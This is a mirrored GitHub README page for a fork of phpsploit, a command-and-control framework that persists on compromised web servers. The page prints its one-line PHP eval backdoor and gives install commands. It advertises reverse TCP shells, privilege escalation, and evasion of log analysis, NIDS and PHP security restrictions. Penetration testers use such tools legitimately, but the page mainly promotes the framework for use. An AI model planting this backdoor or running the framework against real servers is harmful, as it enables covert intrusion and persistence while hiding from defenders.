GithubHelp home page GithubHelp logo

hartl3y94 / phpsploit Goto Github PK

View Code? Open in Web Editor NEW

This project forked from nil0x42/phpsploit

0.0 0.0 0.0 3.31 MB

Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor

License: GNU General Public License v3.0

Python 77.26% PHP 10.27% Shell 12.33% C 0.15%

phpsploit's Introduction

Master

Full-featured C2 framework which silently persists on
webserver via polymorphic PHP oneliner tweet


travis build requires.io requirements codacy code quality lgtm alerts codecov coverage codeclimate maintainability

Created by nil0x42 and contributors


Overview

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Quick Start

git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"

Features

  • Efficient: More than 20 plugins to automate privilege-escalation tasks

    • Run commands and browse filesystem, bypassing PHP security restrictions
    • Upload/Download files between client and target
    • Edit remote files through local text editor
    • Run SQL console on target system
    • Spawn reverse TCP shells
  • Stealth: The framework is made by paranoids, for paranoids

    • Nearly invisible by log analysis and NIDS signature detection
    • Safe-mode and common PHP security restrictions bypass
    • Communications are hidden in HTTP Headers
    • Loaded payloads are obfuscated to bypass NIDS
    • http/https/socks4/socks5 Proxy support
  • Convenient: A robust interface with many crucial features

    • Detailed help for any option (help command)
    • Cross-platform on both client and server.
    • CLI supports auto-completion & multi-command
    • Session saving/loading feature & persistent history
    • Multi-request support for large payloads (such as uploads)
    • Provides a powerful, highly configurable settings engine
    • Each setting, such as user-agent has a polymorphic mode
    • Customisable environment variables for plugin interaction
    • Provides a complete plugin development API

Supported platforms (as attacker):

  • GNU/Linux
  • Mac OS X

Supported platforms (as target):

  • GNU/Linux
  • BSD-like
  • Mac OS X
  • Windows NT

Contributors

๐Ÿ† Hall-of-fame

All contributors Thanks goes to these wonderful people:

nil0x42

๐Ÿ’ป ๐Ÿš‡ ๐Ÿ”Œ โš ๏ธ

shiney-wh

๐Ÿ’ป ๐Ÿ”Œ

Wannes Rombouts

๐Ÿ’ป ๐Ÿšง

Amine Ben Asker

๐Ÿ’ป ๐Ÿšง

jose nazario

๐Ÿ“– ๐Ÿ›

Sujit Ghosal

๐Ÿ“

Zerdoumi

๐Ÿ›

tristandostaler

๐Ÿ›

Rohan Tarai

๐Ÿ›

Jonas Lejon

๐Ÿ“

This project follows the all-contributors specification. Contributions of any kind welcome

phpsploit's People

Contributors

allcontributors[bot] avatar dependabot-preview[bot] avatar dependabot[bot] avatar imgbotapp avatar nil0x42 avatar paralax avatar pyup-bot avatar requires avatar shiney-wh avatar wapiflapi avatar yurilaaziz avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.